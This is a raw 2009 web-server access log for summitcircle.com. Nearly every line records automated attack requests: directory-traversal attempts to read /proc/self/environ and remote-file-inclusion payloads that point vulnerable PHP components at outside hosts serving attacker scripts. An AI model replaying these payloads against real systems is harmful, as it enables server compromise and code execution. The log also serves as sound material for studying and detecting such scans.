91.195.124.16 - - [28/Jun/2009:19:42:30 -0700] "GET /logs/access_081201.log//errors.php?error=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 275 "-" "XXXXXX" "www.summitcircle.com"
91.195.124.16 - - [28/Jun/2009:19:42:30 -0700] "GET /errors.php?error=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 275 "-" "XXXXXX" "www.summitcircle.com"
91.195.124.16 - - [28/Jun/2009:19:42:34 -0700] "GET /logs//errors.php?error=http://www.avunitas.nl/buggsbunny?? HTTP/1.1" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 2.0; Windows 95)" "www.summitcircle.com"
91.195.124.16 - - [28/Jun/2009:19:42:34 -0700] "GET /logs/errors.php?error=http://www.avunitas.nl/buggsbunny?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.summitcircle.com"
91.195.124.16 - - [28/Jun/2009:19:42:35 -0700] "GET /logs//errors.php?error=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 275 "-" "XXXXXX" "www.summitcircle.com"
91.195.124.16 - - [28/Jun/2009:19:42:35 -0700] "GET /logs//errors.php?error=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 275 "-" "XXXXXX" "www.summitcircle.com"
65.23.158.226 - - [28/Jun/2009:19:43:05 -0700] "GET /phphtml.php?htmlclass_path=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.summitcircle.com"
65.23.158.226 - - [28/Jun/2009:19:43:05 -0700] "GET /logs/access_090222.log/phphtml.php?htmlclass_path=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.summitcircle.com"
65.23.158.226 - - [28/Jun/2009:19:43:05 -0700] "GET /logs/phphtml.php?htmlclass_path=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.summitcircle.com"
67.19.130.218 - - [28/Jun/2009:19:46:15 -0700] "GET /technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.euroexpo.ro/atmail/remember.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
67.19.130.218 - - [28/Jun/2009:19:46:16 -0700] "GET /logs//technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.euroexpo.ro/atmail/remember.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
67.19.130.218 - - [28/Jun/2009:19:46:16 -0700] "GET /logs/access_081201.log//technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.euroexpo.ro/atmail/remember.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
91.195.124.16 - - [28/Jun/2009:19:48:09 -0700] "GET /logs/access_090119.log//index.php?page=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 275 "-" "XXXXXX" "www.summitcircle.com"
91.195.124.16 - - [28/Jun/2009:19:48:10 -0700] "GET /index.php?page=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 275 "-" "XXXXXX" "www.summitcircle.com"
91.195.124.16 - - [28/Jun/2009:19:48:10 -0700] "GET /logs//index.php?page=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 275 "-" "XXXXXX" "www.summitcircle.com"
91.195.124.16 - - [28/Jun/2009:19:48:10 -0700] "GET /logs/access_090119.log//index.php?page=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 275 "-" "XXXXXX" "www.summitcircle.com"
91.195.124.16 - - [28/Jun/2009:19:48:10 -0700] "GET /index.php?page=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 275 "-" "XXXXXX" "www.summitcircle.com"
91.195.124.16 - - [28/Jun/2009:19:48:10 -0700] "GET /logs//index.php?page=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 275 "-" "XXXXXX" "www.summitcircle.com"
65.23.158.226 - - [28/Jun/2009:19:48:25 -0700] "GET /logs/phphtml.php?htmlclass_path=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.summitcircle.com"
65.23.158.226 - - [28/Jun/2009:19:48:25 -0700] "GET /logs/access_090222.log/phphtml.php?htmlclass_path=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.summitcircle.com"
65.23.158.226 - - [28/Jun/2009:19:48:25 -0700] "GET /phphtml.php?htmlclass_path=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.summitcircle.com"
65.23.158.226 - - [28/Jun/2009:19:48:27 -0700] "GET /logs/access_090222.log/phphtml.php?htmlclass_path=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.summitcircle.com"
65.23.158.226 - - [28/Jun/2009:19:48:27 -0700] "GET /phphtml.php?htmlclass_path=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.summitcircle.com"
65.23.158.226 - - [28/Jun/2009:19:48:27 -0700] "GET /logs/phphtml.php?htmlclass_path=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.summitcircle.com"
83.13.191.186 - - [28/Jun/2009:19:51:14 -0700] "GET /logs/access_090105.log/errors.php?error=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
83.13.191.186 - - [28/Jun/2009:19:51:14 -0700] "GET /logs/errors.php?error=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
83.13.191.186 - - [28/Jun/2009:19:51:14 -0700] "GET /errors.php?error=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
91.195.124.16 - - [28/Jun/2009:19:51:20 -0700] "GET /logs/access.log//index.php?page=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 275 "-" "XXXXXX" "summitcircle.com"
91.195.124.16 - - [28/Jun/2009:19:51:20 -0700] "GET /index.php?page=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 275 "-" "XXXXXX" "summitcircle.com"
91.195.124.16 - - [28/Jun/2009:19:51:20 -0700] "GET /logs//index.php?page=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 275 "-" "XXXXXX" "summitcircle.com"
91.195.124.16 - - [28/Jun/2009:19:51:21 -0700] "GET /logs/access.log//index.php?page=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 275 "-" "XXXXXX" "summitcircle.com"
91.195.124.16 - - [28/Jun/2009:19:51:21 -0700] "GET /index.php?page=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 275 "-" "XXXXXX" "summitcircle.com"
91.195.124.16 - - [28/Jun/2009:19:51:21 -0700] "GET /logs//index.php?page=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 275 "-" "XXXXXX" "summitcircle.com"
124.115.1.61 - - [28/Jun/2009:19:51:24 -0700] "GET / HTTP/1.1" 200 779 "http://www.summitcircle.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "www.summitcircle.com"
89.223.3.98 - - [28/Jun/2009:19:51:31 -0700] "GET /logs/access_090105.log/errors.php?error=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
89.223.3.98 - - [28/Jun/2009:19:51:31 -0700] "GET /errors.php?error=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
89.223.3.98 - - [28/Jun/2009:19:51:31 -0700] "GET /logs/errors.php?error=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
218.234.21.178 - - [28/Jun/2009:19:51:36 -0700] "GET /logs/access_090222.log/phphtml.php?htmlclass_path=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.summitcircle.com"
218.234.21.178 - - [28/Jun/2009:19:51:36 -0700] "GET /logs/phphtml.php?htmlclass_path=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.summitcircle.com"
218.234.21.178 - - [28/Jun/2009:19:51:36 -0700] "GET /phphtml.php?htmlclass_path=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.summitcircle.com"
124.115.10.193 - - [28/Jun/2009:19:51:38 -0700] "GET / HTTP/1.1" 200 779 "http://www.summitcircle.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "www.summitcircle.com"
124.115.1.62 - - [28/Jun/2009:19:52:07 -0700] "GET / HTTP/1.1" 200 779 "http://www.summitcircle.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "www.summitcircle.com"
124.115.1.66 - - [28/Jun/2009:19:52:14 -0700] "GET / HTTP/1.1" 200 779 "http://www.summitcircle.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "www.summitcircle.com"
88.81.249.202 - - [28/Jun/2009:19:52:15 -0700] "GET /components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.motherwellfc.co.uk/fx1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.summitcircle.com"
88.81.249.202 - - [28/Jun/2009:19:52:15 -0700] "GET /logs/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.motherwellfc.co.uk/fx1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.summitcircle.com"
88.81.249.202 - - [28/Jun/2009:19:52:15 -0700] "GET /logs/access_090119.log/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.motherwellfc.co.uk/fx1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.summitcircle.com"
124.115.1.60 - - [28/Jun/2009:19:52:21 -0700] "GET / HTTP/1.1" 200 779 "http://www.summitcircle.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "www.summitcircle.com"
218.146.231.193 - - [28/Jun/2009:19:54:19 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.unreals.co.cc/v7.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.summitcircle.com"
218.146.231.193 - - [28/Jun/2009:19:54:19 -0700] "GET /logs/access.log//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.unreals.co.cc/v7.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.summitcircle.com"
218.146.231.193 - - [28/Jun/2009:19:54:19 -0700] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.unreals.co.cc/v7.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.summitcircle.com"
88.81.249.202 - - [28/Jun/2009:19:54:35 -0700] "GET /logs/access.log%20%20/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.motherwellfc.co.uk/fx1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)" "www.summitcircle.com"
88.81.249.202 - - [28/Jun/2009:19:54:36 -0700] "GET /components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.motherwellfc.co.uk/fx1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)" "www.summitcircle.com"
88.81.249.202 - - [28/Jun/2009:19:54:36 -0700] "GET /logs/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.motherwellfc.co.uk/fx1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)" "www.summitcircle.com"
88.81.249.202 - - [28/Jun/2009:19:54:56 -0700] "GET /logs/access_090119.log%20%20/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.motherwellfc.co.uk/fx1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)" "www.summitcircle.com"
60.43.229.5 - - [28/Jun/2009:19:55:19 -0700] "GET /include/plugins/jrBrowser/purchase.php?jamroom%5Bjm_dir%5D=http://www.euroexpo.ro/atmail/remember.txt??? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
60.43.229.5 - - [28/Jun/2009:19:55:19 -0700] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom%5Bjm_dir%5D=http://www.euroexpo.ro/atmail/remember.txt??? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
60.43.229.5 - - [28/Jun/2009:19:55:19 -0700] "GET /logs/access_090209.log/include/plugins/jrBrowser/purchase.php?jamroom%5Bjm_dir%5D=http://www.euroexpo.ro/atmail/remember.txt??? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
91.195.124.16 - - [28/Jun/2009:19:56:51 -0700] "GET /logs/access_090119.log//PhpLinkExchange/bits_listings.php?svr_rootP=http://www.avunitas.nl/buggsbunny?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "www.summitcircle.com"
91.195.124.16 - - [28/Jun/2009:19:56:51 -0700] "GET /logs/access_090119.log/errors.php?error=http://www.avunitas.nl/buggsbunny?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.summitcircle.com"
91.195.124.16 - - [28/Jun/2009:19:56:51 -0700] "GET /PhpLinkExchange/bits_listings.php?svr_rootP=http://www.avunitas.nl/buggsbunny?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "www.summitcircle.com"
91.195.124.16 - - [28/Jun/2009:19:56:51 -0700] "GET /logs/access_090119.log//PhpLinkExchange/bits_listings.php?svr_rootP=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 275 "-" "XXXXXX" "www.summitcircle.com"
91.195.124.16 - - [28/Jun/2009:19:56:51 -0700] "GET /errors.php?error=http://www.avunitas.nl/buggsbunny?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.summitcircle.com"
91.195.124.16 - - [28/Jun/2009:19:56:52 -0700] "GET /logs/access_090119.log//PhpLinkExchange/bits_listings.php?svr_rootP=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 275 "-" "XXXXXX" "www.summitcircle.com"
91.195.124.16 - - [28/Jun/2009:19:56:52 -0700] "GET /PhpLinkExchange/bits_listings.php?svr_rootP=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 275 "-" "XXXXXX" "www.summitcircle.com"
91.195.124.16 - - [28/Jun/2009:19:56:52 -0700] "GET /PhpLinkExchange/bits_listings.php?svr_rootP=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 275 "-" "XXXXXX" "www.summitcircle.com"
91.195.124.16 - - [28/Jun/2009:19:56:52 -0700] "GET /logs//PhpLinkExchange/bits_listings.php?svr_rootP=http://www.avunitas.nl/buggsbunny?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "www.summitcircle.com"
91.195.124.16 - - [28/Jun/2009:19:56:53 -0700] "GET /logs/errors.php?error=http://www.avunitas.nl/buggsbunny?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.summitcircle.com"
91.195.124.16 - - [28/Jun/2009:19:56:53 -0700] "GET /logs//PhpLinkExchange/bits_listings.php?svr_rootP=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 275 "-" "XXXXXX" "www.summitcircle.com"
91.195.124.16 - - [28/Jun/2009:19:56:53 -0700] "GET /logs//PhpLinkExchange/bits_listings.php?svr_rootP=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 275 "-" "XXXXXX" "www.summitcircle.com"
88.81.249.202 - - [28/Jun/2009:19:58:07 -0700] "GET /components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.motherwellfc.co.uk/fx1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "www.summitcircle.com"
88.81.249.202 - - [28/Jun/2009:19:58:07 -0700] "GET /logs/access.log/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.motherwellfc.co.uk/fx1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "www.summitcircle.com"
88.81.249.202 - - [28/Jun/2009:19:58:07 -0700] "GET /logs/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.motherwellfc.co.uk/fx1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "www.summitcircle.com"
88.81.249.202 - - [28/Jun/2009:19:58:17 -0700] "GET /logs/access_090119.log/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.motherwellfc.co.uk/fx1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "www.summitcircle.com"
218.234.21.178 - - [28/Jun/2009:19:58:30 -0700] "GET /phphtml.php?htmlclass_path=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.summitcircle.com"
218.234.21.178 - - [28/Jun/2009:19:58:30 -0700] "GET /logs/access_090222.log/phphtml.php?htmlclass_path=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.summitcircle.com"
218.234.21.178 - - [28/Jun/2009:19:58:30 -0700] "GET /logs/phphtml.php?htmlclass_path=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.summitcircle.com"
65.23.158.226 - - [28/Jun/2009:19:59:34 -0700] "GET /login.php?dir=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "summitcircle.com"
65.23.158.226 - - [28/Jun/2009:19:59:34 -0700] "GET /logs//login.php?dir=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "summitcircle.com"
65.23.158.226 - - [28/Jun/2009:19:59:34 -0700] "GET /logs/access.log//login.php?dir=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "summitcircle.com"
65.23.158.226 - - [28/Jun/2009:19:59:41 -0700] "GET /logs/access.log//login.php?dir=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "summitcircle.com"
65.23.158.226 - - [28/Jun/2009:19:59:41 -0700] "GET /logs//login.php?dir=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "summitcircle.com"
65.23.158.226 - - [28/Jun/2009:19:59:41 -0700] "GET /login.php?dir=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "summitcircle.com"
218.234.21.178 - - [28/Jun/2009:19:59:46 -0700] "GET /logs/access.log//login.php?dir=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "summitcircle.com"
218.234.21.178 - - [28/Jun/2009:19:59:46 -0700] "GET /logs//login.php?dir=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "summitcircle.com"
218.234.21.178 - - [28/Jun/2009:19:59:46 -0700] "GET /login.php?dir=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "summitcircle.com"
218.234.21.178 - - [28/Jun/2009:19:59:48 -0700] "GET /login.php?dir=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "summitcircle.com"
218.234.21.178 - - [28/Jun/2009:19:59:48 -0700] "GET /logs//login.php?dir=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "summitcircle.com"
218.234.21.178 - - [28/Jun/2009:19:59:48 -0700] "GET /logs/access.log//login.php?dir=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "summitcircle.com"
65.23.158.226 - - [28/Jun/2009:19:59:52 -0700] "GET /login.php?dir=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.summitcircle.com"
65.23.158.226 - - [28/Jun/2009:19:59:52 -0700] "GET /logs/access_090413.log//login.php?dir=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.summitcircle.com"
65.23.158.226 - - [28/Jun/2009:19:59:53 -0700] "GET /logs//login.php?dir=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.summitcircle.com"
65.23.158.226 - - [28/Jun/2009:19:59:56 -0700] "GET /logs/access_090413.log//login.php?dir=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.summitcircle.com"
65.23.158.226 - - [28/Jun/2009:19:59:56 -0700] "GET /logs//login.php?dir=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.summitcircle.com"
65.23.158.226 - - [28/Jun/2009:19:59:56 -0700] "GET /login.php?dir=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.summitcircle.com"
221.195.40.213 - - [28/Jun/2009:20:00:00 -0700] "GET /logs/access_090222.log//classes/adodbt/sql.php?classes_dir=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.summitcircle.com"
65.23.158.226 - - [28/Jun/2009:20:00:01 -0700] "GET /logs/access_090119.log//login.php?dir=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.summitcircle.com"
221.195.40.213 - - [28/Jun/2009:20:00:02 -0700] "GET /classes/adodbt/sql.php?classes_dir=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.summitcircle.com"
221.195.40.213 - - [28/Jun/2009:20:00:04 -0700] "GET /logs//classes/adodbt/sql.php?classes_dir=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.summitcircle.com"
65.23.158.226 - - [28/Jun/2009:20:00:16 -0700] "GET /logs/access_090119.log//login.php?dir=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.summitcircle.com"
